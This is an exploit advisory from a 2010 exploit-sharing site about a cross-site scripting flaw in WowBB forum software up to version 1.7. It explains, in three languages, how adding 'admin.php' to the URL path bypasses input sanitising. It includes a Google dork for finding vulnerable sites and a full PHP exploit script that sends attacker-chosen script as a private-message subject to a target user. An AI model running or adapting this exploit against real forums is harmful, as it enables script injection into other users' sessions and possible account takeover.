WowBB <= 1.7 XSS Vulnerabilities

Posted on 14 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WowBB &lt;= 1.7 XSS Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================
WowBB &lt;= 1.7 XSS Vulnerabilities
================================


+-------------------------------------------------------------------------------------------------------------------------------+
|				 _______         __                ______     							|
|				|    |  |.--.--.|  |--..-----.    |      |.----..-----..--.--.--.				|
|				|       ||  |  ||    &lt; |  -__|    |   ---||   _||  -__||  |  |  |				|
|				|__|____||_____||__|__||_____|    |______||__|  |_____||________|				|
+-------------------------------------------------------------------------------------------------------------------------------+
| Name: WowBB &lt;= 1.7 XSS													|
| Software: WowBB &lt;= 1.7													|
| Site: http://www.wowbb.com/													|
| Download: WowBB is NOT free.													|
| Vulnerability: Cross Site Scripting												|
| Severity: medium ( low / medium / high )											|
| Tested on: 1.7														|
| Dork: &quot;Powered by WowBB&quot;													|
+-------------------------------------------------------------------------------------------------------------------------------+
| Author: Lord-Anubis														|
| Contact: lord.anu bis4[at]gm ail[dot]com											|
| Date: 15.06.2010 ( dd.mm.yyyy )												|
| Site: http://lordanubis.altervista.org/											|
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug File: lib.php														|
| 587.	if ((strpos($HTTP_SERVER_VARS[&quot;PHP_SELF&quot;], &quot;admin.php&quot;) === false) and ($xss_protect) and (key($a) != &quot;message&quot;))	|
| 588.		$a[key($a)] = htmlspecialchars(current($a));									|
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug Explanation:														|
|	- EN:	In file lib.php the superglobal array POST/GET is santize by function array_addslashes(). This function uses	|
|		addslashes() if magic_quotes_gpc is enabled in php.ini and uses htmlspecialchars() if user doesn't navigate in	|
|		file admin.php. Bug is exploitable when is inserted the string &quot;admin.php&quot; on url. This example is not usable,	|
|		but is need to understand:											|
|		1) http://www.[site].com/[path]/index.php?var=&lt;script&gt;alert(1)&lt;/script&gt; &lt;--- is santize				|
|		2) http://www.[site].com/[path]/index.php/admin.php?var=&lt;script&gt;alert(1)&lt;/script&gt; &lt;--- is NOT santize		|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- ITA: 	Nel file lib.php le array superglobali POST/GET vengono purificate dalla funzione array_addslashes(), che	|
|		utilizza addslashes() se magic_quotes_gpc è settato a 1 nel file php.ini e utilizza htmlspecialchars() se	|
|		l'utente NON si trova nel file admin.php. E' possibile sfruttare il bug facendo credere all'applicazione di	|
|		trovarci nel pannello amministrativo e di conseguenza inniettare codice javascript senza che esso venga		|
|		purificato. Un esempio che non è attuabile, ma che rende l'idea, è:						|
|		1) http://www.[site].com/[path]/index.php?var=&lt;script&gt;alert(1)&lt;/script&gt; &lt;--- viene purificata			|
|		2) http://www.[site].com/[path]/index.php/admin.php?var=&lt;script&gt;alert(1)&lt;/script&gt; &lt;--- NON viene purificata	|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- PL:	W pliku lib.php super globalne array POST/GET jest czyszczone przez funkcje array_addslashes(), ta funkcja	|
|		uzywa addslashes() kiedy magic_quotes_gpc jest ustawiony na 1 w pliku php.ini, i uzywa htmlspecialchars() kiedy	|
|		uzyktownik nie jest w panelu administracynjnym. Wpisujac admin.php w url mozna udac, ze sie znajduje w panelu 	|
|		administacyjnym i wprowadzajac cod javascript. Ten przyklad nie yest wykonalny, ale pomaga to zrozumiec:	|
|		1) http://www.[site].com/[path]/index.php?var=&lt;script&gt;alert(1)&lt;/script&gt; &lt;--- yest czyszczona			|
|		2) http://www.[site].com/[path]/index.php/admin.php?var=&lt;script&gt;alert(1)&lt;/script&gt; &lt;--- NIE yest czyszczona	|
+-------------------------------------------------------------------------------------------------------------------------------+
| Exploit:															|
+-------------------------------------------------------------------------------------------------------------------------------+
&lt;?php
/**
 * exploit.php
 *
 * Software: WowBB &lt;= 1.7
 * Author: Lord-Anubis &lt;lord.anu bis4[at]gm ail[dot]com&gt;
 * Vulnerability: Cross Site Scripting
 */

//
error_reporting(0);
ini_set(&quot;max_execution_time&quot;, 0);
ini_set(&quot;default_socket_timeout&quot;, 5);

//
function sendPacket($packet) {
	global $hostName;
    if (!$sock = fsockopen(gethostbyname($hostName), 80)) {
		exit(&quot;[-] No response from '{$hostName}'
&quot;);
	}

	fputs($sock, $packet);
	while (!feof($sock)) {
		$html .= fgets($sock);
    }
	
	fclose($sock);
	return $html;
}

//
if ($argc &lt; 5) {
	exit(
		&quot;[+] Software: WowBB &lt;= 1.7
&quot;.
		&quot;[+] Author: Lord-Anubis
&quot;.
		&quot;[+] Vulnerability: Cross Site Scripting
&quot;.
		&quot;[+] Usage: ./exploit [hostName] [path] [evilUserName] [yourCookie] [Code]
&quot;.
		&quot;[+] Example:
&quot;.
		&quot;[+] ./exploit 127.0.0.1 / admin anubis%7C%7C9f55c7e99c128fb18b0ce725a8c2bdea &lt;script&gt;[...]&lt;/script&gt;
&quot;.
		&quot;[+] ./exploit hostname.com /wowbb/ mod mark%7C%7Cea82410c7a9991816b5eeeebe195e20a &lt;h1&gt;lol&lt;/h1&gt;
&quot;
	);
}

//
$hostName = $argv[1];
$path	  = $argv[2];
$userName = $argv[3];
$cookie	  = $argv[4];
$evilCode = $argv[5];

//
if (count(explode(&quot;%7C&quot;, $cookie)) &lt; 3) {
	exit(&quot;[-] Your cookie is invalid
&quot;);
}

//
$postData = &quot;message=Hello_Bro&amp;spell_check=&amp;preview_pm=&amp;post_pm=1&amp;pm_to=$userName&amp;pm_subject=$evilCode&quot;;
$packet   = &quot;POST http://{$hostName}{$path}pm.php/admin.php HTTP/1.1
&quot;;
$packet  .= &quot;Content-Type: application/x-www-form-urlencoded
&quot;;
$packet  .= &quot;Host: {$hostName}
&quot;;
$packet  .= &quot;Content-Length: &quot;.strlen($postData).&quot;
&quot;;
$packet  .= &quot;Cookie: wowbb=$cookie;

&quot;;
$packet  .= $postData;
sendPacket($packet);

//
$packet  =&quot;GET http://{$hostName}{$path}pm.php?folder_id=101 HTTP/1.0
&quot;;
$packet .=&quot;Host: {$hostName}
&quot;;
$packet .= &quot;Cookie: wowbb=$cookie;

&quot;;
$packet .=&quot;Connection: Close

&quot;;
if (preg_match('/&lt;a id=&quot;link[0-9]+&quot; href=&quot;javascript:show_message([0-9]+)&quot;&gt;'.preg_quote($evilCode, '/').'&lt;/a&gt;/is', sendPacket($packet))) {
	exit(&quot;[+] Exploit successfull
&quot;);
} else {
	exit(&quot;[-] Exploit failed
&quot;);
}
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20